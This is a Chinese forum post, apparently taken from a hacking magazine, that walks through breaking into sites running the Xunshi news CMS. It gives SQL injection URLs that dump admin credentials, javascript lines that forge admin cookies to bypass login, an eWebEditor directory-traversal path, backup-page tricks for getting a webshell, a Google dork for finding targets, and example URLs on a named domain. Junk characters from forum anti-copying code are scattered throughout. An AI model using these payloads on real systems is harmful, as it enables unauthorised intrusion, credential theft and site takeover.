讯时漏洞总结

admin

by:血封忆尘

在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
5 Y* ^9 \& b5 K( {) q: M& X
1 S" Y( l# n( P以下本文总结来自黑防去年第9期杂志上的内容...
! o" ~; y$ c. ~( s- f; j5 E1 B
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

( R% I" f7 o. v, D8 y26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
2 \6 v! @6 I8 b
效果如图:



这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

" a6 N) o$ e  f- t' E3 h2 k3 B密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
* d& T4 X$ |' q% R( C. d" E5 {- Z
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

* m8 L. K/ b7 s+ k$ y2 |& f那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
7 W5 H" f* \4 l( ?0 G
0 e+ k1 u2 ?3 G0 Q0 v; H; A因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
( j* d. o) l5 ^9 m+ g2 _, M. O
& Y& L+ d2 @! d. p# x3 h. Y/ l它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
1 R3 n8 a5 n: ~& S& j# a
访问这页面来列目录..步骤如下:
  @! \/ ]7 n# P3 d4 T/ M0 @: b
javascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... asp?id=46&dir=../..

& T2 W+ ^" [. C# v效果如图:

: ?: W6 B/ ^8 b0 l" t

) H! q; i+ ~& c# A% f( Q这样全站目录都能瞧了..找到后台目录..进去..
4 Q6 _% ?& S3 A- x/ t4 u
! U! \6 K8 D( d" o% P那么进了后台怎么拿shell？？上传--备份就ok了..
$ s3 D9 Y+ E& k1 V
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

这个我也碰到过一次..你都可以通过列目录来实现..
" M( K7 x: h: C: Q+ \# l. Q
) F9 x! R* i* Ujavascript:alert(document.cookie="admindj=1")
" c, T, u, _/ H- J6 J
, p6 Z2 u' o$ D" n* a6 D' whttp://www.political-security.co ... p?action=BackupData

8 T0 P6 u7 R$ Z6 q5 H4 c- |备份ok..
  t1 L) o# t  S! \2 U
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
1 j5 p# k: k3 f( Y
然后访问此页面进行注入..步骤如下:

0 p1 d* _% u( u3 Gjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

; V7 D+ h) q/ ?: I- ~然后请求admin/admin_chk.asp页面
# d! V: _: T6 g8 e8 [5 Z* q+ z& L
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
& d( S8 O& G) T; q9 Z, j
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
$ J. Q5 n! m5 N; w9 E
效果如图所示:


  Y* {- a9 J7 i8 @
讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）

9 ?( Y6 P1 P: z& G4 L7 B4 `1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句

  w# E1 D% B- V8 [$ E) T3 v  G2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！

- ~9 _. m. ~4 v, k" ]. S" N/ E
( }) _4 c/ L* @
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
7 z7 `# W0 r" I3 W
/ U3 G+ u1 R" p/ y

爆出管理员帐号和密码了
- C2 r3 M# g/ G6 p7 F! r% |8 d


4、cookies进后台

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));



& p1 m$ D1 I  M- H% o' K( n5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！

) Y. P  g' y9 r
+ N' o" F* _6 V, x# T* _9 V) }' h
) P3 m8 t% y3 P/ t* h- ~- k7 B6、后台有上传和备份取SHELL不难。
+ o$ \0 B, H- v' x& ]  ^1 P# @9 ]
  i2 I/ r( l8 T+ G7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
* p0 u' b+ r7 H4 k
; |: J3 e! _4 {% g; Z逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
6 x" ?6 E$ p6 S
) c+ q6 d9 X5 a
- L/ g9 R3 H9 y) h6 C
  |) [& h+ m7 N( y+ P